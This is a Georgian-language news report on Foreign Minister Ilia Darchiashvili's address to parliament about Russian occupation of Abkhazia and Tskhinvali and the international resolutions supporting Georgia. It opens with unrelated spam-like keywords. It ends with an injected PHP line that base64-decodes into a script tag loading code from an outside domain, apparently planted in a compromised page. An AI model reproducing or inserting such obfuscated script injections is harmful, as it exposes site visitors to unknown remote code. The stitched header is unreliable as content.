celsiusi
ავერსი შნაიდერი
საქართველოს საგარეო საქმეთა მინისტრი ილია დარჩიაშვილი, საქართველოს პარლამენტში „მინისტრის საათის“ ფორმატში წარსდგა, სადაც ქვეყნის წინაშე არსებულ მთავარ გამოწვევაზე – ოკუპაციაზე და რუსეთის მხრიდან განხორციელებული აგრესიის მძიმე შედეგებზე ისაუბრა.
 
„რუსეთის ფედერაციის მიერ უკრაინის წინააღმდეგ დაწყებული ფართომასშტაბიანი სამხედრო აგრესიის შედეგად განსაკუთრებით დამძიმდა რეგიონში უსაფრთხოების გარემო, რაც დამატებით გამოწვევებს ქმნის საქართველოსთვის. ჩვენ ძალისხმევას არ ვიშურებთ ამ ტურბულენტური ვითარების ფონზე რუსეთის მიერ საქართველოს ტერიტორიების ოკუპაციის თემის და რუსეთ-საქართველოს კონფლიქტის მშვიდობიანი მოგვარების აუცილებლობის საკითხის საერთაშორისო დღის წესრიგში აქტუალიზაციისთვის“, – განაცხადა მინისტრმა.
 
მან ყურადღება გაამახვილა შემდეგ დოკუმენტებზე – გაერო-ს გენერალური ასამბლეის ყოველწლიური რეზოლუცია – „აფხაზეთიდან და ცხინვალის რეგიონიდან/სამხრეთ ოსეთიდან, იძულებით გადაადგილებულ პირთა და ლტოლვილთა სტატუსის შესახებ“; გაერო-ს ადამიანის უფლებათა საბჭოს რეზოლუცია – „თანამშრომლობა საქართველოსთან“; გაერო-ს უშიშროების საბჭოს წევრების განცხადება რუსეთ-საქართველოს ომის მე-14 წლისთავთან დაკავშირებით; ევროპარლამენტის რეზოლუცია აღმოსავლეთ პარტნიორობის არეალში უსაფრთხოების შესახებ; ევროპის საბჭოს მინისტრთა მოადგილეების კომიტეტის გადაწყვეტილება; ევროპის საბჭოს გენერალური მდივნის კონსოლიდირებული ანგარიში; ეუთო-ში საქართველოს მეგობართა ჯგუფის ერთობლივი განცხადებები, მათ შორის აგვისტოს ომის წლისთავთან დაკავშირებით.
 
დარჩიაშვილის თქმით, საქართველოს დიპლომატიური სამსახური მთელი წლის მანძილზე აქტიურად იყენებდა ყველა არსებულ დიპლომატიურ თუ სამართლებრივ ინსტრუმენტის საერთაშორისო მხარდაჭერის მობილიზების უზრუნველყოფისთვის, რათა გაძლიერდეს რუსეთის ფედერაციაზე დიპლომატიური წნეხი მისი საერთაშორისო ვალდებულებების ჯეროვნად შესრულების მიზნით.
 
ამასთან, მინისტრის განცხადებით, მუდმივ რეჟიმში ხდებოდა საერთაშორისო პარტნიორების ინფორმირება საქართველოს ოკუპირებულ ტერიტორიებზე არსებულ მძიმე ჰუმანიტარულ ვითარებასთან დაკავშირებით.
 
„სწორედ ქართული მხარის აქტიური დიპლომატიური ნაბიჯების შედეგად ჩვენი პარტნიორების მხრიდან გვაქვს მკაფიო მხარდაჭერა, რაც აისახება პარტნიორი ქვეყნებისა და საერთაშორისო ორგანიზაციების საჯარო განცხადებებში და არაერთ დოკუმენტში. ამ პროცესში მნიშვნელოვან ადგილს იკავებდა ადამიანის უფლებათა ევროპული სასამართლოს მიერ 2021 წლის 21 იანვარს მიღებული ისტორიული გადაწყვეტილება, რითაც დადგინდა რუსეთის პასუხისმგებლობა 2008 წლის აგვისტოს ომის დროს ადამიანის უფლებათა ევროპული კონვენციის არაერთი მუხლის დარღვევისათვის, რადგან იგი ახორციელებდა ეფექტურ კონტროლს ცხინვალის რეგიონსა და აფხაზეთზე“, – განმარტა დარჩიაშვილმა.
 
314
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");